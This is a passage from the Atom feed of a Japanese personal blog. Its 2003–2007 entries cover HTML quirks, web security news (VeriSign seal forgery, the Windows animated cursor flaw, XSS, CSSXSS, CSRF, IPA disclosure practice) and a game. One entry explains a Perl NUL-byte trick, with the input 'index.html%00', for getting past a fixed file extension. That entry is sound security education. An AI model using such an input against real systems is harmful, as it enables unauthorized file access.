推奨されない理由は？</p><p>ある範囲の文字列を斜体で表示したい場合を考えて下さい。HTMLでは &lt;i&gt;～&lt;/i&gt; で囲んだ領域は斜体で表示されると決まっています。しかし、&lt;i&gt;～&lt;/i&gt;を使うことは最新のHTMLでは推奨されていません。（XHTMLでは使えません。）</p><p>それはなぜでしょうか？</p></blockquote><p class="cite">以上、<a href="http://allabout.co.jp/internet/hpcreate/closeup/CU20070512A/index7.htm">全問正解できる？ HTML文法基礎クイズ</a> より</p></div><p>うーん、<dfn class="element"><a href="../../ref/html/element/i">i要素</a></dfn>は HTML4 では deprecated になっていませんし、XHTML1.0 Strict にも存在しますし、XHTML1.1 の Presentation モジュールにも存在しますので、私の常識で考えると問題自体が狂っているとしか思えません。</p><p>「最新のHTML」という言葉が HTML5 の WD を、「XHTML」という言葉が XHTML2 の WD を指しているのだとするとつじつまは合うかもしれませんが、いくらなんでもちょっと新しすぎると思います。どちらもワーキングドラフトですし……。</p></div><ul class="comment-link"><li><a href="../topic/2882/comment">「最新のHTMLって何?」へのコメント (12件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/HTML">HTML</a></span></p></div></div></content></entry><entry><title>セキュアサイトシールは飾りか</title><link href="http://bakera.jp/ebi/topic/680" /><id>tag:bakera.jp,2008:/ebi/topic/680</id><updated>2007-04-08T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/6/30">2003年6月30日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/680">セキュアサイトシールは飾りか</a></h2><p class="subinfo"><span class="updated">更新: 2007年4月8日</span></p><p><dfn class="glossary"><a href="../../glossary/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E3%83%9B%E3%83%BC%E3%83%ABmemo">セキュリティホールmemo</a></dfn> の ML に<a href="http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/memo/2003.06/msg00101.html">「ベリサインのセキュアサイトシールは飾りか」などという話</a> <em class="domain-info">(www.st.ryukoku.ac.jp)</em>がありましたが、もちろん YES でしょう。何しろ任意の内容のセキュアシールを捏造できる状態ですので、ベリサインのセキュアサイトシール自体に信頼性が全くありません。</p><p>この話は「<a href="https://www.netsecurity.ne.jp/article/1/5829.html">いまだに残る日本ベリサイン偽装問題 Beyond Security とiDefense が検証(2002.7.5)</a> <em class="domain-info">(www.netsecurity.ne.jp)</em>」という記事でずっと前から公になっていますが、いまだにできてしまうようですね。</p><p class="note">※2007-04-08追記 : ずいぶん前にシールは新しいものになり、古い URL ではアクセスできなくなりました。今ではこの捏造はできなくなっているはずです。</p><p>こういうのも一種の <dfn class="glossary"><a href="../../glossary/XSS">XSS</a></dfn> と言えるのかしら。</p><ul class="comment-link"><li><a href="../topic/680/comment">「セキュアサイトシールは飾りか」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/SSL%EF%BC%8FTLS">SSL/TLS</a> / <a href="../genre/%E3%82%B7%E3%83%BC%E3%83%AB">シール</a></span></p></div></div></content></entry><entry><title>Windowsアニメーションカーソルの脆弱性</title><link href="http://bakera.jp/ebi/topic/2833" /><id>tag:bakera.jp,2008:/ebi/topic/2833</id><updated>2007-04-02T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2007/3/30">2007年3月30日(金曜日)</a></h1><div class="topic"><h2><a href="../topic/2833">Windowsアニメーションカーソルの脆弱性</a></h2><p class="subinfo"><span class="updated">更新: 2007年4月2日</span></p><p>「<a href="http://www.microsoft.com/japan/technet/security/advisory/935423.mspx">マイクロソフト セキュリティ アドバイザリ (935423) Windows アニメーション カーソル処理の脆弱性</a> <em class="domain-info">(www.microsoft.com)</em>」。</p><p>うへー、これは厳しいですね。</p><p>CSS の <prop>cursor</prop> プロパティで cursor: url(……); という具合に任意の画像を指定できるわけでして。そもそも cursor プロパティで画像を指定できる機能って要らないんですが、無効にする方法なんてあるのでしょうか。あらかじめユーザスタイルシートで cursor を全部指定しておく?</p><p class="note">※追記: 「画像」と書きましたがもちろん Win IE 向けには *.ani なファイルが指定できちゃったりします。さらに参考 : <a href="http://d.hatena.ne.jp/hasegawayosuke/20070330/p2">葉っぱ日記 -  「Windowsアニメーションカーソルの脆弱性」@水無月ばけらのえび日記</a> <em class="domain-info">(d.hatena.ne.jp)</em></p><p class="note">※2007-04-02追記 : *.ani なファイルは favicon としても使えてしまいます (えむけいさん情報ありがとうございます)。回避方法はないですね……。関連: <a href="../topic/2839">続・Windowsアニメーションカーソルの脆弱性</a>。</p><ul class="comment-link"><li><a href="../topic/2833/comment">「Windowsアニメーションカーソルの脆弱性」へのコメント (3件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a></span></p></div></div></content></entry><entry><title>やっぱり筆名では受理されないのか?</title><link href="http://bakera.jp/ebi/topic/2783" /><id>tag:bakera.jp,2008:/ebi/topic/2783</id><updated>2007-02-05T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2007/2/4">2007年2月4日(日曜日)</a></h1><div class="topic"><h2><a href="../topic/2783">やっぱり筆名では受理されないのか?</a></h2><p class="subinfo"><span class="updated">更新: 2007年2月5日</span></p><p>「<a href="http://d.hatena.ne.jp/Hamachiya2/20070203/ipa4">IPAたんからお礼が！</a> <em class="domain-info">(d.hatena.ne.jp)</em>」。なんだかんだで受理ですか……って、なんだこりゃ。感謝だけですか?</p><p>今まで、こんな内容のメールは見たことがありません。受理されたら受理されたというメールが来るのですが、それとは明らかに内容が異なります。……これ、やっぱり届出としては受理されていないのかも。とりあえずテキトーにスルーしつつ、「不受理だけど通知する」というパターンで処理されているのかもしれません。</p><p>まあ、いずれにしても、脆弱性関連情報が適切に通知されることになったのであれば、結果としては良いのだろうと思いますが。</p><p class="note">※2007-02-05追記 : はせがわさんの<a href="http://d.hatena.ne.jp/hasegawayosuke/">葉っぱ日記</a> <em class="domain-info">(d.hatena.ne.jp)</em>で<a href="http://d.hatena.ne.jp/hasegawayosuke/20070204/p1">言及していただきました</a> <em class="domain-info">(d.hatena.ne.jp)</em> (ありがとうございます)。「はせがわようすけ」と名乗って受理されたことがあるそうで。ただ、そのコメント欄にもあるとおり、常連だと扱いが違うという可能性はあるかもしれません。</p><ul class="comment-link"><li><a href="../topic/2783/comment">「やっぱり筆名では受理されないのか?」へのコメント (4件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/IPA">IPA</a> / <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E6%83%85%E5%A0%B1%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E6%97%A9%E6%9C%9F%E8%AD%A6%E6%88%92%E3%83%91%E3%83%BC%E3%83%88%E3%83%8A%E3%83%BC%E3%82%B7%E3%83%83%E3%83%97">情報セキュリティ早期警戒パートナーシップ</a></span></p></div></div></content></entry><entry><title>特殊な環境下?</title><link href="http://bakera.jp/ebi/topic/2723" /><id>tag:bakera.jp,2008:/ebi/topic/2723</id><updated>2006-12-06T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2006/11/30">2006年11月30日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/2723">特殊な環境下?</a></h2><p class="subinfo"><span class="updated">更新: 2006年12月6日</span></p><p>「<a href="http://jvn.jp/jp/JVN%2308494205/index.html">JVN#08494205 Chama Cargo におけるクロスサイトスクリプティングの脆弱性</a> <em class="domain-info">(jvn.jp)</em>」。ひたすら良くある <dfn class="glossary"><a href="../../glossary/XSS">XSS</a></dfn> ですが、開発者の方のコメントを見ると……。</p><div class="quote-and-cite"><blockquote cite="http://www.chama.ne.jp/download/cargo/jvn/08494205.htm"><p>悪意の第三者に誘導され、ユーザのブラウザ上で任意のスクリプトを実行される可能性があります。</p><p>特殊な環境下で問題が発生しますが、問題が発生する環境や方法などの詳細は公開出来ません。</p></blockquote><p class="cite">以上、<a href="http://www.chama.ne.jp/download/cargo/jvn/08494205.htm">Chama Cargo におけるクロスサイトスクリプティングの脆弱性について</a> より</p></div><p>うーん、「特殊な環境下」ですか。</p><p>実はこれ、知り合いの方に「ちょっと脆弱性がないか見て欲しい」と頼まれて見たときに発見したものです。その時点では、これが「Chama Cargo」の問題なのか、そのサイトに固有の問題なのか判断できませんでしたので、その切り分けを行いました。具体的には、Google で「Chama Cargo」を使用しているサイトを検索し、上位のサイトをいくつか見て、同様の問題があるのかどうかを確認しています。その結果、全てのサイトで問題を確認できたので、環境固有の問題ではないと判断し、ソフトウエア製品の脆弱性として届出を行いました。</p><p>というわけなので、報告者としては「特殊な環境下で発生する問題ではない」ということを確認した上で届け出たつもりなのですが、開発者の方の認識は異なるようで……。カテゴリ別の商品一覧のページで問題が起きるのですが、ひょっとすると「カテゴリ別商品一覧のページを用意すること自体が特殊である」という認識なのかもしれません。</p><p>いずれにしても、「特殊な環境でしか問題が発生しないから、普通の人は大丈夫」と思われてしまいかねない記述になっているのは、ちょっと気になりますね。まあ、自分が「特殊な環境」に相当するのかどうかという情報も与えられていませんから、全員アップデートするしかないのでしょうけれども。</p><p class="note">※……それはそれとして、JVN のドキュメントになんか違和感があるなあと思ったら、報告者名が敬称略になってますね。こだわりませんが……。身内と思ってもらっているのかなぁ。</p><p class="note">※2006-12-06追記 : 敬称追加されたようです。ありがとうございます。</p><ul class="comment-link"><li><a href="../topic/2723/comment">「特殊な環境下?」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/IPA">IPA</a> / <a href="../genre/JPCERT%EF%BC%8FCC">JPCERT/CC</a> / <a href="../genre/%E6%83%85%E5%A0%B1%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E6%97%A9%E6%9C%9F%E8%AD%A6%E6%88%92%E3%83%91%E3%83%BC%E3%83%88%E3%83%8A%E3%83%BC%E3%82%B7%E3%83%83%E3%83%97">情報セキュリティ早期警戒パートナーシップ</a> / <a href="../genre/%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E8%84%86%E5%BC%B1%E6%80%A7">クロスサイトスクリプティング脆弱性</a></span></p></div></div></content></entry><entry><title>また Google八分か?</title><link href="http://bakera.jp/ebi/topic/2710" /><id>tag:bakera.jp,2008:/ebi/topic/2710</id><updated>2006-11-18T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2006/11/13">2006年11月13日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/2710">また Google八分か?</a></h2><p class="subinfo"><span class="updated">更新: 2006年11月18日</span></p><p>「<a href="http://internet.watch.impress.co.jp/static/yajiuma/index.htm">やじうまWatch</a> <em class="domain-info">(internet.watch.impress.co.jp)</em>」で紹介されていた「<a href="http://www.gakushuin.ac.jp/~881791/fs/">「水からの伝言」を信じないでください</a> <em class="domain-info">(www.gakushuin.ac.jp)</em>」というサイトですが、</p><div class="quote-and-cite"><blockquote><p>11 月 11 日前後から、このページが Google の検索にかからなくなっているようです。いわゆる「Google 八分」ではないかとの憶測もされていますが、単なる技術的な不具合の可能性も高いそうです。この段階で、憶測にもとづいて過剰反応するのは全く得策ではないと考えます。よろしくお願いします（11月13日）。</p></blockquote></div><p>……だそうで、Google八分疑惑が持ち上がっている模様です。確かに、Google で http://www.gakushuin.ac.jp/~881791/fs/ を検索しても何もヒットしないので、インデクスに無い状態であることは間違いなさそうです。</p><p>コメントにもあるとおり、現時点では憶測でしかなく、確かな事は何も言えませんが……。</p><p class="note">※<a href="http://homepage3.nifty.com/hirorin/tondemotaisho2002.htm#mizuhakotaeo">第11回トンデモ本大賞</a> <em class="domain-info">(homepage3.nifty.com)</em>にノミネートされて有名になった(?)「<span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4763193961&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">水は答えを知っている―その結晶にこめられたメッセージ</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4763193961" alt="" width="1" height="1" /></span>」という本を批判する内容なので、作者や出版元からクレームが付いた可能性も考えられますね。繰り返しになりますが、現時点では憶測でしかありません。</p><p class="note">※2006-11-18追記 : 現在では検索できるようになっています。Google八分ではなかった模様です。</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/2710/comment">「また Google八分か?」へのコメント (5件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/Google">Google</a> / <a href="../genre/%E3%83%88%E3%83%B3%E3%83%87%E3%83%A2">トンデモ</a></span></p></div></div></content></entry><entry><title>強化された学者</title><link href="http://bakera.jp/ebi/topic/2611" /><id>tag:bakera.jp,2008:/ebi/topic/2611</id><updated>2006-09-08T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2006/8/25">2006年8月25日(金曜日)</a></h1><div class="topic"><h2><a href="../topic/2611">強化された学者</a></h2><p class="subinfo"><span class="updated">更新: 2006年9月8日</span></p><p><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/B000CSFA0A&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">FF3</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=B000CSFA0A" alt="" width="1" height="1" /></span>は、魔道師ハインのところまで。現時点で気づいた点などをメモしておきます。</p><ul><li>ボスが強化されているかも。ボスは基本的に2回行動します。ドラクエかよっ。オーエンの塔のメデューサなんて何の印象も無いボスだったはずですが、かなり苦戦しました。</li><li>今回も、レベルアップ時に体力の高いジョブになっていると HP の伸びが良くなります。やけに HP が少なかったルーネスをナイトにしていたら、あっさりトップになりました。ただ、移行期間中は体力も下がっているので、レベルアップする時だけジョブチェンジというのは難しいかも。<p class="note">※2006-09-08追記: 実は移行期間でも HP の上昇量は減りません。レベルアップ時だけジョブチェンジでも OK です。</p></li><li>熟練度の影響が大きくなっている模様。熟練度は攻撃回数にも影響するようで、熟練度40のシーフ (ルーネス) と熟練度6のシーフ (レフィア) を比較したところ、レベル・装備が同じでもあからさまに攻撃回数が違いました。</li><li>ナイトが弱い……。素早さが低いので攻撃回数が少なく、攻撃力大幅ダウン。戦士の上位ジョブという位置づけではなくなったということですね。まあ、そのかわり白魔法が使えたり、体力が高かったりしますが。</li><li>学者が強化されています。「みやぶる」と「しらべる」が統合されていたり、レベルの低い魔法が使えるようになったりしています (取説には LV1～3 の魔法が使えると書いてありますが、このあたりのレベルでは LV1 の魔法しか使えないのであまり期待しないように)。が、そんなことよりもアイテムの効果2倍というのが強力。</li></ul><p>学者の強化ぶりは凄いです。魔道師ハイン戦で、黒魔道師が MP を使い果たしたので仕方なく学者が「ボムのかけら」を使ったら、約2000のダメージ……。もともと魔道師ハイン専用ジョブと考えられていましたが、この強化でますますハインキラーになりました。学者×4で速攻というのもありそうですね。ただ、体力が低いのは相変わらずなので、常用するのはつらいかもしれません。</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/2611/comment">「強化された学者」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%B2%E3%83%BC%E3%83%A0">ゲーム</a> / <a href="../genre/%E3%83%8B%E3%83%B3%E3%83%86%E3%83%B3%E3%83%89%E3%83%BCDS">ニンテンドーDS</a> / <a href="../genre/FF3">FF3</a></span></p></div></div></content></entry><entry><title>ipa.go.jpでさがしもの</title><link href="http://bakera.jp/ebi/topic/2532" /><id>tag:bakera.jp,2008:/ebi/topic/2532</id><updated>2006-08-22T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2006/5/21">2006年5月21日(日曜日)</a></h1><div class="topic"><h2><a href="../topic/2532">ipa.go.jpでさがしもの</a></h2><p class="subinfo"><span class="updated">更新: 2006年8月22日</span></p><p><a href="http://www.ipa.go.jp/about/press/20060413.html">第2回IPA賞</a> <em class="domain-info">(www.ipa.go.jp)</em>の受賞者に「コーディング作法ワーキンググループ」という方々がエントリーされているのですが、その成果物である「コーディング作法ガイド」というものが <a href="http://www.ipa.go.jp">IPAのサイト</a> <em class="domain-info">(www.ipa.go.jp)</em>からダウンロードできるらしいという話を聞いていたので、ちょっと読んでみようかと探してみました。</p><p>……いろいろ探してみたつもりなのですが、結局、Google で「コーディング作法ワーキンググループ」を検索したらすぐに発見できました。本当にありがとうございました。</p><p class="note">※しかし、ついでに余計なものまで発見してしまったような……。</p><p class="note">※2006-08-22追記 : 余計なもの (脆弱性) は修正されました。ご対応ありがとうございました。</p><ul class="comment-link"><li><a href="../topic/2532/comment">「ipa.go.jpでさがしもの」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a></span></p></div></div></content></entry><entry><title>情報処理試験でNUL文字攻撃の問題など</title><link href="http://bakera.jp/ebi/topic/2519" /><id>tag:bakera.jp,2008:/ebi/topic/2519</id><updated>2006-04-20T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2006/4/17">2006年4月17日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/2519">情報処理試験でNUL文字攻撃の問題など</a></h2><p class="subinfo"><span class="updated">更新: 2006年4月20日</span></p><p>スラッシュドットに「<a href="http://slashdot.jp/askslashdot/06/04/17/0551221.shtml">情報処理試験(2006年春)はどうでしたか</a> <em class="domain-info">(slashdot.jp)</em>」というトピックができていますね。今回、「テクニカルエンジニア(情報セキュリティ)」という試験区分が新たに追加されたとのこと。</p><p>「<a href="http://www.jitec.jp/1_04hanni_sukiru/mondai_kaitou.html">情報処理技術者試験センター：問題冊子・配点割合・解答例</a> <em class="domain-info">(www.jitec.jp)</em>」として問題が公開されているので見てみましたが、<dfn class="glossary"><a href="../../glossary/%E3%83%87%E3%82%A3%E3%83%AC%E3%82%AF%E3%83%88%E3%83%AA%E3%83%88%E3%83%A9%E3%83%90%E3%83%BC%E3%82%B5%E3%83%AB">ディレクトリトラバーサル</a></dfn>や<dfn class="glossary"><a href="../../glossary/SQL%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%A7%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3">SQLインジェクション</a></dfn>の攻撃手法を答えさせるものがあったりして、なかなか興味深いです。</p><p>個人的に印象深かったのは、拡張子指定を迂回する話ですね。Perl スクリプトで、外部から与えられた $fname という名前に対して '.cep' という文字列を連結してから open に渡しています。$fname は何もサニタイズされていませんが、プログラム内で '.cep' という固定の文字列が連結されてから open に渡りますので、これを書いた人は「拡張子 .cep のファイルにしかアクセスできない」と思っているわけです。そこで「任意のファイルにアクセスする方法を答えよ」というのが問題になります。</p><p>まあ、単にファイル名の後ろに NUL文字をつけるだけなのですが、この手法、意外に知られていないように思います。以前、私が社内向けのセミナーで紹介したことがあるのですが、普段から Perl のプログラムを書いていて、<dfn class="glossary"><a href="../../glossary/XSS">XSS</a></dfn>などは知り尽くしているような人にも「初耳」と言われたりしましたので……。</p><p class="note">※Perl の open は NUL を含むファイル名を渡されると NUL 以降を無視します。クエリに index.html%00 などと指定すると index.html(NUL).cep という文字列が open に渡ることになりますが、index.html.cep ではなく index.html が開かれます。</p><p class="note">※2006-04-20追記: もう少し正確に言うと、Perl は NUL を含むファイル名をそのまま OS に渡すので、結果として NUL 以降が無視されます。Perl が一律に文字列の NUL 以降を無視しているわけではないので注意が必要です。詳しくはコメント欄を参照してください (PANDA さんありがとうございます)。</p><p>ところで話は変わりますが、こんなご意見が。</p><div class="quote-and-cite"><blockquote><p>まあIPAが「XSS＝クッキー漏洩」としか考えていないことは、脆弱性届け出状況 [ipa.go.jp]とかを見ても明らかなのだがorz</p></blockquote></div><p>それはあるいは私のせいかも。届出様式には「5) 脆弱性により発生しうる脅威」という項目があって、これは届出者が書いていますので。</p><ul class="comment-link"><li><a href="../topic/2519/comment">「情報処理試験でNUL文字攻撃の問題など」へのコメント (11件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a></span></p></div></div></content></entry><entry><title>CSSXSS対策された模様</title><link href="http://bakera.jp/ebi/topic/2510" /><id>tag:bakera.jp,2008:/ebi/topic/2510</id><updated>2006-04-14T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2006/4/12">2006年4月12日(水曜日)</a></h1><div class="topic"><h2><a href="../topic/2510">CSSXSS対策された模様</a></h2><p class="subinfo"><span class="updated">更新: 2006年4月14日</span></p><p>本日のパッチによって、いわゆる CSSXSS の対策がなされたようです。同一ドメイン上の CSS の内容は読めますが、他ドメインの CSS に対して cssText プロパティを参照しようとすると、「アクセスが拒否されました」と言われて失敗します。</p><p>これにより、他ドメインの任意のコンテンツにアクセスできてしまうといったことはなくなったはずです。端的に言うと、Firefox と同様になったということですね。</p><p class="note">※2006-04-14追記 : 一応の対策はなされたものの、完全に FIX したわけではなく、依然としてアクセスする方法があるようです。参考 : <a href="http://d.hatena.ne.jp/hoshikuzu/20060414#P20060414IECSSXSS">InternetExplorerのいわゆるCSSXSS脆弱性と4月度のセキュリティ更新プログラムについて(その２)</a> <em class="domain-info">(d.hatena.ne.jp)</em></p><p class="note">※ちなみに Firefox の場合は <a href="http://www.w3.org/TR/DOM-Level-2-Style/">DOM2-style</a> <em class="domain-info">(www.w3.org)</em> 準拠で、document.styleSheets[0].cssRules[0].cssText などとしてアクセスすることができます。これも同一ドメインでは取得できますが、クロスドメインでは取得できません。</p><ul class="comment-link"><li><a href="../topic/2510/comment">「CSSXSS対策された模様」へのコメント (7件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a></span></p></div></div></content></entry><entry><title>CSRFの説明に追記</title><link href="http://bakera.jp/ebi/topic/2507" /><id>tag:bakera.jp,2008:/ebi/topic/2507</id><updated>2006-04-03T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2006/3/30">2006年3月30日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/2507">CSRFの説明に追記</a></h2><p class="subinfo"><span class="updated">更新: 2006年4月3日</span></p><p>「<a href="http://www.jumperz.net/texts/csrf.htm">開発者のための正しいCSRF対策</a> <em class="domain-info">(www.jumperz.net)</em>」。</p><p>CSRF の対策としては「攻撃者の知り得ない値」をリクエストに含める必要があり、その候補のひとつとして Cookie が上げられていました。それ自体は CSRF の対策としては正しいのですが、今回、Cookie の値を HTML 中に書き出すと別の危険性があるという指摘がされています。特定ブラウザ (MSIE) の問題ではあるのですが、確かに危険ですので、<dfn class="glossary"><a href="../../glossary/CSRF">CSRF</a></dfn>の解説に追記しておきました。</p><p class="note">※ちなみに「<dfn class="glossary"><a href="../../glossary/CSSXSS">CSSXSS</a></dfn>」と呼ばれている問題の本質は「クロスドメインで任意の HTML の内容が読み取れてしまう」という点です。これは XSS とはあまり関係ありませんし、ある意味 XSS よりも危険です。その呼称は誤解を招くと個人的には思っています。</p><p class="note">※2006-04-03追記: リンク先ですが、あっさりと閉鎖されてしまったようです。どう考えても名誉毀損を構成するような内容ではなかったと思いますが……。</p><ul class="comment-link"><li><a href="../topic/2507/comment">「CSRFの説明に追記」へのコメント (16件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/CSRF">CSRF</a> / <a href="../genre/CSSXSS">CSSXSS</a></span></p></div></div></content></entry><entry><title>CSRF 知名度上昇中</title><link href="http://bakera.jp/ebi/topic/2283" /><id>tag:bakera.jp,2008:/ebi/topic/2283</id><updated>2005-11-01T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2005/4/23">2005年4月23日(土曜日)</a></h1><div class="topic"><h2><a href="../topic/2283">CSRF 知名度上昇中</a></h2><p class="subinfo"><span class="updated">更新: 2005年11月1日</span></p><p>「<a href="http://www.itmedia.co.jp/enterprise/articles/0504/23/news005.html">大量の「はまちちゃん」を生み出したCSRFの脆弱性とは？</a> <em class="domain-info">(www.itmedia.co.jp)</em>」という記事が出ています。やはり、CSRF というものを今回初めて知ったという方が多かったということでしょうか。</p><div class="quote-and-cite"><blockquote cite="http://www.itmedia.co.jp/enterprise/articles/0504/23/news005.html"><p>IPAとJPCERT/CCが4月19日に行った、2005年第1四半期の脆弱性届出状況に関する説明会でも言及されていた。</p></blockquote><p class="cite">以上、<a href="http://www.itmedia.co.jp/enterprise/articles/0504/23/news005.html">大量の「はまちちゃん」を生み出したCSRFの脆弱性とは？</a> より</p></div><p>言及されていましたけれど、説明がしょぼくてなんだかよく分からなかった人が多かったのではないでしょうか。基本的に IPA の報告は統計データを報告するのが趣旨で、脆弱性の技術情報詳細が発表されないのは当然ではあるのですが……別途、もっと技術詳細が公開された方が良いだろうと思うのですよね。</p><p>そんなこんなで、もう発見者が (具体的なサイト名などは伏せて) 脆弱性の技術的な詳細を積極的に公表するべきではないのか、と思いはじめています。しかし取扱い終了となったものは問題ないとしても、取扱いが終了していないものについては公表できないのが問題です。</p><p class="note">※2005年Q1 に IPA に届け出られたという CSRF の問題も、まだ取扱いが終了していません。CSRF はその場で簡単に修正できるような問題ではなく、設計段階から再考しなくてはいけないような問題ですので、対応には時間がかかることが予想されます。取扱いが終わらないと内容について言及することができなかったりしますので、なんとも苦しいところです。</p><p class="note">※2005-11-01 追記: 修正されました。<a href="../topic/2440">CSRF 直った</a>参照。</p><ul class="comment-link"><li><a href="../topic/2283/comment">「CSRF 知名度上昇中」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/CSRF">CSRF</a> / <a href="../genre/IPA">IPA</a></span></p></div></div></content></entry><entry><title>脆弱性届出状況2005年Q1</title><link href="http://bakera.jp/ebi/topic/2270" /><id>tag:bakera.jp,2008:/ebi/topic/2270</id><updated>2005-11-01T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2005/4/19">2005年4月19日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/2270">脆弱性届出状況2005年Q1</a></h2><p class="subinfo"><span class="updated">更新: 2005年11月1日</span></p><p>2005年 Q1 の脆弱性届出状況が公表されました。</p><ul><li><a href="http://www.ipa.go.jp/security/vuln/report/vuln2005q1.html">ソフトウエア等の脆弱性関連情報に関する届出状況[2005年第1四半期（1月～3月）]</a> <em class="domain-info">(www.ipa.go.jp)</em></li><li><a href="http://internet.watch.impress.co.jp/cda/news/2005/04/19/7346.html">SSIインジェクションやCSRFなどの新たな問題も～IPAの脆弱性届出状況</a> <em class="domain-info">(internet.watch.impress.co.jp)</em>」</li><li><a href="http://www.itmedia.co.jp/enterprise/articles/0504/19/news079.html">IPA、2005年第1四半期の脆弱性関連情報の取扱状況を発表</a> <em class="domain-info">(www.itmedia.co.jp)</em>」</li></ul><div class="quote-and-cite"><blockquote><p>今四半期中に、製品開発者により脆弱性ではないと判断されたもの、不受理としたものはありませんでした。</p></blockquote><p class="cite">以上、ソフトウエア等の脆弱性関連情報に関する届出状況 [2005年第1四半期（1月～3月）] より</p></div><p>「不受理とした」ものはあるような気がしますが、その後に「やっぱり脆弱性として取り扱うことにしました」といって受理された場合には不受理にはカウントされないということなのでしょうね。まあそりゃそうか。</p><p>ウェブアプリケーションの方では、「新しい」脆弱性として <dfn class="glossary"><a href="../../glossary/CSRF">CSRF</a></dfn> について言及されています。</p><div 